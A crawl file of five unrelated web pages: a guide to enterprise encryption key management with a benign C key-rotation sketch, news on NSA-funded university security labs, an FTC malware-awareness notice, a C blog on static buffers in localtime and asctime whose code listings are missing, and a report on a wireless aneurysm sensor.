This may also be implemented via Smart Cards. The security policy should define where different keys should be stored and cached. The master keys are used to encrypt all operational keys that should be stored in cipher text in separated databases. Security metadata and operational encryption keys should be kept in cipher text (even when stored in memory) until needed for use by crypto-services routines. All communication both external and internal is encrypted. All Data Protection System services should be using X.509 certificates and SSL for secure distribution of encryption keys. Unique keys should be generated for each Enforcement Agent, and should be used when sending information between system components. The data encryption method should be based on different encryption keys for different columns, tables, files and directories. An optimal design for Hardware Security Module support can be based on an optimal combination of hardware and software keys. Supported Hardware Security Module should be tamper evident and compliant with FIPS PUB 140-2 Level 3 Security Requirements for Cryptographic Modules, and keys are randomly generated in compliance with ANS X9.24 Section 7.4. Key validation, access control and logging Key validation is performed by integrity checking the security metadata that is kept in ciphered text (even in memory). Key access control is performed by role-based authorization of users, allowing for specific authorized actions by user (select/insert/update/delete). Users can be authenticated by any accepted means of the native database. Any encrypt/decrypt operation requested by the user is verified against the policy by the Enforcement Agent after authorization and authentication checks have been completed by the database. Under the control of the authenticated Security Administrator, the system should generate a Master Key used to encrypt all operational keys. Security data remains ciphered until needed for use by crypto-services routines. The master keys and data encryption keys should be secured, and their integrity checked. All communication, external and internal, should be encrypted. The system may use public key cryptography to exchange the symmetric encryption keys. The Key Management System must support tracking of; when keys are created and deleted; who created and deleted them; who used what keys; and what was done with the key. Key protection and aging Encryption keys should be protected and encrypted when stored in memory or databases, and during transport between systems and system processes. The use of a combination of software cryptography and specialized cryptographic chipsets, called a Hardware Security Module, can provide a selective added level of protection, and help to balance security, cost, and performance needs. Certain fields in a database require a stronger level of encryption, and a higher level of protection for associated encryption keys. Encryption keys and security metadata should continuously be encrypted and integrity validated – even when communicated between processes, stored or cached in memory. Security data should remain ciphered until needed for use by crypto-services routines. Key Rotation, or more accurately Key Aging, is best security practices and required in some governmental regulations and industry initiatives. More sensitive data and data more exposed systems should be re-encrypted with fresh encryption keys more frequently than the rest of the data. 
A well designed automated key rotation solution can provide zero down-time by attaching key labels to each record or data field in the operation databases and file systems. The Automated key rotation process can run in background and utilize spare cycles on each available processor on your data servers. The background processing can be assigned a priority level that will complete the key rotation according to the policy that is defined. Secure key storage To maintain a high level of security the end-point server platform should provide the choice to only temporarily cache encrypted lower level data encryption keys. Key encryption keys should always be stored encrypted on separated platforms. A central server with a hardened standard computing platform to store the keys can provide a cost effective solution. Keys should be kept in an encrypted format in memory (cached) until they are to be used. Data encryption keys should be stored in encrypted format in a separate data server along with other policy information, optionally on the Security Administration System repository or on the local database where the Enforcement Agent is installed, depending on the operational requirements and security level of the data that is protected. All keys except the Master Key should be stored (encrypted) under the Key Encryption Keys. The Master Key should also be protected while in transient storage or be kept inside the Hardware Security Module storage, depending on the operational requirements and security level of the data that is protected by the keys. Effective protection of memory cached keys Memory attacks may be theoretical, but cryptographic keys, unlike most other data in a computer memory, are random. Looking through memory structures for random data is very likely to reveal key material. Well made libraries for use as Native Encryption Services go to great efforts to protect keys even in memory. Key-encryption keys are used to encrypt the key while it is in memory and then the encrypted key is split into several parts and spread throughout the memory space. Decoy structures may be created to mimic valid key material. Memory holding the key is quickly zeroed as soon as the cryptographic operation is finished. These techniques reduce the risk of memory attacks. Separate encryption keys should be used for different data. These encryption keys can be automatically rotated based on the sensitivity of the protected data. A Dedicated Encryption Systems can provide separation between processes or servers dedicated to encryption operations but they are also vulnerable to memory attacks. However, a well made Dedicated Encryption System runs only the minimal number of services. Since web servers, application servers, and databases have no place on a dedicated cryptographic engine, these common attack points are not a threat. This severely constrained attack surface makes it much more difficult to gain the access needed to launch a memory attack. The security classification of the protected data will help in deciding a topology that will give the right balance between security, performance and scalability for each type of environment within an organization. Key backup and recovery A weak link in the security of many networks is the backup process. Often, private keys and certificates are archived unprotected along with configuration data from the backend servers. The backup key file may be stored in clear text or protected only by an administrative password. 
This password is often chosen poorly and/or shared between operators. To take advantage of this weak protection mechanism, hackers can simply launch a dictionary attack (a series of educated guesses based on dictionary words) to obtain private keys. To maintain a high level of security and separation the application data backup files should be separated from the backup of encrypted lower level data encryption keys. After keys are created, they must be archived to a secure storage environment where they can be kept for long periods of time. Master keys should be backed up separately. During installation, the master key should be generated and stored on removable media for recovery purposes. Maintaining this media in escrow and/or at your disaster recovery site is best practice. Backup of keys on the Security Administration System should be performed on a regular basis, usually before and after major policy changes are realized. Backup of the encrypted data encryption keys should be automated and performed at the same time as business data backup, using standard database backup and restore procedures. Even if policies or keys have changed, or if the Security Administration System is unavailable, any Enforcement Agent and its protected database may be restored successfully as long as access to the Master Key is provided via proper user authentication. The Key Management System must be able to survive multiple hardware and site failures and still be able to retrieve the archived keys to unlock encrypted data. The Key Management System must support creation and management of “split keys,” so that the ability to decrypt data requires cooperation of multiple persons, each knowing only their part of the key, to reconstruct the whole key. We have reviewed crucial guidelines and best practices for a Key Management System for data encryption based on the approach of a central point of control for key management and distributed encryption and policy enforcement across applications, databases and file systems. The solution provides great flexibility by combining the benefits from hardware and software based encryption and key management. This approach addresses the requirements for central security control while providing the flexibility to allow security professionals to deploy encryption at the appropriate place in their infrastructure. It provides the needed balance between advanced security, availability, and performance for the combined solution. The concept of separate key domains across a data flow can isolate different systems from a risk perspective and it can also accommodate for differences in the operational requirements. Best practices dictate that we must protect sensitive data at the point of capture, as it’s transferred also over internal networks and when it is at rest. A mature solution for encryption and key management can provide this higher level of protection of information.
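To make two of the mechanisms described above concrete -- data-encryption keys stored only in wrapped form under a key-encryption key, and a key label on every record so that key rotation can run as a background pass with zero downtime -- here is a small C sketch. The structures and the three provider calls (kek_unwrap, dek_encrypt, dek_decrypt) are hypothetical placeholders standing in for an HSM or a vetted cryptographic library, not a real API; they are only declared so the sketch compiles, and a production system would never implement these primitives by hand.

#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KEY_LEN  32                     /* 256-bit symmetric keys              */
#define MAX_KEYS 16                     /* key generations known to the agent  */

/* A data-encryption key (DEK) is kept only in wrapped (encrypted) form;
 * it is unwrapped under the key-encryption key (KEK) just before use.   */
typedef struct {
    uint8_t wrapped_dek[KEY_LEN];       /* DEK ciphertext under the KEK */
} key_entry;

typedef struct {
    uint32_t key_label;                 /* which DEK generation encrypted it */
    uint8_t  ciphertext[256];
    size_t   len;
} record;

/* Hypothetical crypto-provider calls (HSM or vetted library). */
int kek_unwrap(const uint8_t wrapped[KEY_LEN], uint8_t dek_out[KEY_LEN]);
int dek_encrypt(const uint8_t dek[KEY_LEN], const uint8_t *in, size_t n,
                uint8_t *out, size_t *out_n);
int dek_decrypt(const uint8_t dek[KEY_LEN], const uint8_t *in, size_t n,
                uint8_t *out, size_t *out_n);

static key_entry key_table[MAX_KEYS];   /* wrapped DEKs, indexed by label */
static uint32_t  current_label = 3;     /* label of the freshest DEK      */

/* Background rotation: re-encrypt a record that still carries an old key
 * label, then stamp it with the current label.  Records already on the
 * current key are skipped, so the pass can run incrementally.           */
int rotate_record(record *r)
{
    if (r->key_label == current_label)
        return 0;                       /* already on the fresh key */

    uint8_t old_dek[KEY_LEN], new_dek[KEY_LEN], plain[256];
    size_t  plain_len = 0, new_len = 0;
    int rc = -1;

    if (kek_unwrap(key_table[r->key_label].wrapped_dek, old_dek) == 0 &&
        kek_unwrap(key_table[current_label].wrapped_dek, new_dek) == 0 &&
        dek_decrypt(old_dek, r->ciphertext, r->len, plain, &plain_len) == 0 &&
        dek_encrypt(new_dek, plain, plain_len, r->ciphertext, &new_len) == 0) {
        r->len = new_len;
        r->key_label = current_label;
        rc = 0;
    }

    /* Zero key material and plaintext as soon as they are no longer needed
     * (a real implementation would use explicit_bzero or memset_s so the
     * compiler cannot optimise the wipe away).                            */
    memset(old_dek, 0, sizeof old_dek);
    memset(new_dek, 0, sizeof new_dek);
    memset(plain,   0, sizeof plain);
    return rc;
}

Because every record carries its own key label, readers can always decrypt with whichever key generation is named, and the rotation pass never has to take the data set offline -- essentially the zero-downtime key aging scheme described above.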
<urn:uuid:d0684861-ae53-4a4f-9d9d-2fbd5d107145>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2007/12/10/key-management-for-enterprise-data-encryption/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922789
3,605
3
3
College students can probably learn a thing or two about security from the National Security Agency, right? The NSA hopes so, as it is funding small labs dubbed "lablets" at research universities that will focus on the Science of Security. Carnegie Mellon University, North Carolina State University, the University of Illinois Urbana-Champaign and the University of Maryland have received millions in grants for the project. + ALSO on Network World: The NSA's Weird Alphabet Soup of code names for secret spy programs and hacker tools + “All of the work is basic science, without any publication restrictions,” says William Scherlis, professor and director of the Institute for Software Research -- and of the security lablet -- at Carnegie Mellon. “The point of all this is to build a network of SoS thinking.” This combines computer science, software engineering, behavioral science and economics, and addresses questions in areas such as scalability and human behavior. The University of Maryland has received $4.5 million over three years to establish its lablet. "Much of the existing work in cybersecurity is reactive, and focuses on designing 'point solutions' to specific problems," says Jonathan Katz, director of the Maryland Cybersecurity Center(MC2) and lead principal investigator of the lablet. "Our goal is to establish mathematical models that can be used to address cybersecurity threats more broadly, and to carry out empirical studies that can help validate those models."
<urn:uuid:b207becf-1293-4d24-b1fa-69c462bc5c2d>
CC-MAIN-2017-04
http://www.networkworld.com/article/2226895/security/how-adorable--nsa-hatches--lablets--at-4-universities.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00122-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937269
299
2.609375
3
Criminals are hard at work thinking up creative ways to get malware on your computer, warns the Federal Trade Commission. With appealing Web sites, desirable downloads, and compelling stories, these criminals try to lure consumers to links that will download malware, especially on computers that don't use adequate security software. Then, they use the malware -- malicious software -- to steal personal information, send spam, and commit fraud. A new publication from the FTC has information that could help consumers protect their computers against malware and reclaim their computer and electronic information if malware is already on their computer. The publication, "Minimizing the Effects of Malware," provides tips on spotting malware, and urges consumers to act immediately if they suspect their computer is affected by malware. More information is available through OnGuardOnline.gov, a multimedia, interactive consumer education campaign launched by the FTC and a partnership of other federal agencies and the technology industry. The comprehensive Web site has tips, articles, videos, and interactive activities. The quizzes and information on OnGuardOnline.gov can be downloaded by companies and other organizations to use in their own computer security programs. OnGuardOnline.gov and the Spanish-language version, AlertaenLinea.gov, have logged more than five million unique visits since they were launched on September 27, 2005.
<urn:uuid:3582cf50-2f02-4b00-8b27-a35380c08c8e>
CC-MAIN-2017-04
http://www.govtech.com/security/FTC-Offers-Information-on-Protecting-Reclaiming.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00242-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937457
266
2.875
3
Beware the trap of time functions
Blog author: Kewen Lin; translator: Roy Hu

When we develop applications in the C programming language, we often use C time library functions, such as time, localtime, ctime, mktime, and asctime, to get or print out time-related information. But you might not notice an interesting phenomenon. Let's first take a look at the following example (the listing is abridged here; a condensed sketch of the same program appears at the end of this article):

1 #include <stdio.h>
...

Before checking the output of this program, let's consider the following questions: (1) What are the relationships among the values of the structure variables tm_1, tm_2, and tm_3 on line 22? (2) On lines 23-26, is the time of tm_2 really three seconds later than that of tm_1? Now, let's take a look at the output of the code above: is the result the same as what you expected? Actually, tm_1, tm_2 and tm_3 on line 22 point to the same location. In the implementation of the localtime function, a static internal struct tm structure is used to store the corresponding time information. Each time the localtime function is invoked, this internal struct tm structure is modified; that is, the structure stores only the latest invocation result. Therefore, the localtime function returns the same struct tm structure each time. It means that the subsequent invocations of the asctime function on lines 23-25 actually pass the same structure (i.e., a pointer to the same location). As a result, it is no wonder that they print out the same time.

Let's take a look at another code example:

1 #include <stdio.h>
...

The code on lines 1-28 is the same as the first code example, so let's focus on the rest of this code example. Since the localtime function returns the same internal static structure address, you might want to assign it to a local structure. By doing so, the previous value of the localtime function can be stored, and will not be overwritten by a subsequent invocation, as shown by lines 35-36. Then, you might wonder: will the time of tm_4 and tm_5 printed out by line 41 be the same as the result printed out by lines 44-45? Let's take a look at the output of PART II: is the output the same as what you expected? To our surprise, the time strings of tm_4 and tm_5 printed by line 41 are the same. However, we know that tm_4 and tm_5 are different time structures, by printing out the addresses of the tm_4 and tm_5 structures and their corresponding second values (tm_sec). Actually, the problem is caused by the asctime function. By printing out the returned pointer addresses after calling the asctime function on tm_4 and tm_5, we find that the returned addresses are the same. Judging from the behavior of the asctime function, we can tell that its internal implementation is actually similar to that of the localtime function: it also uses an internal static character array to store converted time strings. Each time the asctime function is invoked, this string is modified, and the function returns the same address, the address of the internal static character array. Let's analyze what line 41 does:
1) Call asctime(&tm_4), update the internal static character array based on tm_4, and return the address of the character array;
2) Call asctime(&tm_5), update the internal static character array based on tm_5, and return the address of the character array. In this step, the new tm_5 information overwrites the original tm_4 information.
3) Print out the string that is pointed to by the first argument (i.e. the internal static character array).
At this time, this string has already been updated with the information of tm_5, so it prints out the time information of tm_5.
4) Print out the string that is pointed to by the second argument (i.e., again the time of tm_5).
On line 44, we print out the time information of tm_4 immediately after calling the asctime function. Similarly to what we do with the localtime function, we can use a local character array to store the result of calling the asctime function; then the result will not be overwritten by a subsequent invocation. According to the POSIX standard, time functions such as asctime(), ctime(), gmtime(), and localtime() return an internal static object, either a struct tm structure or a character array. Therefore, we should be very cautious when calling these functions. If you do not need to store the invocation result, print it out right away; otherwise, use a local structure or buffer to store it temporarily. For details, see the documentation of the asctime and localtime functions.
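The two numbered listings this article steps through did not survive in this copy, so the line numbers quoted above refer to code that is not shown. The condensed sketch below is not the original program, but it reproduces both effects the article describes: localtime() handing back a pointer to one static struct tm, and asctime() reusing one static character buffer. The variable names mirror the article; everything else is illustrative, and it assumes a POSIX system for sleep().

#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>     /* sleep(); assumes a POSIX system */

int main(void) {
    /* PART I: localtime() returns a pointer to a single static struct tm. */
    time_t t1 = time(NULL);
    struct tm *tm_1 = localtime(&t1);
    sleep(3);
    time_t t2 = time(NULL);
    struct tm *tm_2 = localtime(&t2);

    printf("tm_1=%p tm_2=%p\n", (void *)tm_1, (void *)tm_2); /* same address   */
    printf("tm_1: %s", asctime(tm_1));                        /* both lines     */
    printf("tm_2: %s", asctime(tm_2));                        /* show the later time */

    /* PART II: copying the struct keeps the values apart, but asctime()
     * itself reuses one static character buffer.                        */
    struct tm tm_4, tm_5;
    time_t t4 = time(NULL);
    tm_4 = *localtime(&t4);
    sleep(3);
    time_t t5 = time(NULL);
    tm_5 = *localtime(&t5);

    /* Both calls return the same buffer, so the same string is printed
     * twice (whichever conversion happened to run last).                */
    printf("%s%s", asctime(&tm_4), asctime(&tm_5));

    /* Safe: copy each result before the next call overwrites it. */
    char buf4[26], buf5[26];            /* asctime strings are 26 bytes */
    strcpy(buf4, asctime(&tm_4));
    strcpy(buf5, asctime(&tm_5));
    printf("tm_4: %s", buf4);
    printf("tm_5: %s", buf5);
    return 0;
}

On systems that provide them, the re-entrant variants localtime_r() and asctime_r() take a caller-supplied struct tm or character buffer and avoid the shared static state altogether.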
<urn:uuid:d3c8d012-a9cc-4176-8b94-90f348e174b1>
CC-MAIN-2017-04
https://www.ibm.com/developerworks/community/blogs/5894415f-be62-4bc0-81c5-3956e82276f3/entry/beware_the_trap_of_time_functions?lang=en
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00150-ip-10-171-10-70.ec2.internal.warc.gz
en
0.877855
1,103
2.828125
3
Wireless Implant Monitors Aneurysms
By M.L. Baker | Posted 12-12-2005

On Monday, the Michael E. DeBakey VA Medical Center announced that it had implanted the EndoSure sensor in patients who were receiving stents to protect against aortic aneurysms. The sensor, approved by the FDA last month, promises a more effective, cheaper and safer way to make sure the stents are working. Aneurysms occur when a weakened area of an artery gives way, creating a bulge. This is most likely to happen in the abdominal aorta, just under the kidneys. Abdominal aortic aneurysms are the third leading cause of sudden death in elderly U.S. men and the 13th leading cause of death in the United States.

The device, made by CardioMEMS Inc., is implanted in the aneurysm sac. When activated by an external device, it transmits information about pressure inside the aneurysm. According to the Division of Vascular Surgery and Endovascular Therapy of Emory University, which tested the sensor, aneurysms are typically repaired by inserting a stent into the affected blood vessel. This takes the pressure off the aneurysm by creating a new route for blood to flow. But since the stents can leak and cause the aneurysm to rupture, they require regular check-ups.

The sensor provides a new way to monitor that pressure. Instead of expensive CT (computed tomography) scans every six or 12 months, physicians can place an antenna over a patient's abdomen to make sure that the stent is still holding up; sensor information is converted to a pressure waveform and displayed on a screen. Besides the expense, CT scans are also problematic because they can fail to detect small leaks and require contrast dye and radiation that might harm patients, said Ruth Bush, MEDVAMC vascular surgeon.

"Because this cutting-edge device is inside the aneurysm, it can give us information we never had before. We are now able to monitor pressure changes and receive important feedback regarding the stent graft's ability to appropriately seal off the aneurysm from systemic circulation. This system provides an opportunity for us to know whether the aneurysm is truly protected against rupture after endovascular repair," said Wei Zhou, M.D., MEDVAMC vascular surgeon.

According to its producer, CardioMEMS Inc., the device is the first wireless, permanently implantable pressure sensor to become commercially available in the United States. It received FDA approval after testing in 100 patients in Brazil, Argentina and Canada and at nine hospitals in the United States.
<urn:uuid:fdea3a7b-0efa-4a16-a525-f80badc61723>
CC-MAIN-2017-04
http://www.cioinsight.com/print/c/a/Health-Care/Wireless-Implant-Monitors-Aneurysms
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00544-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943834
578
2.703125
3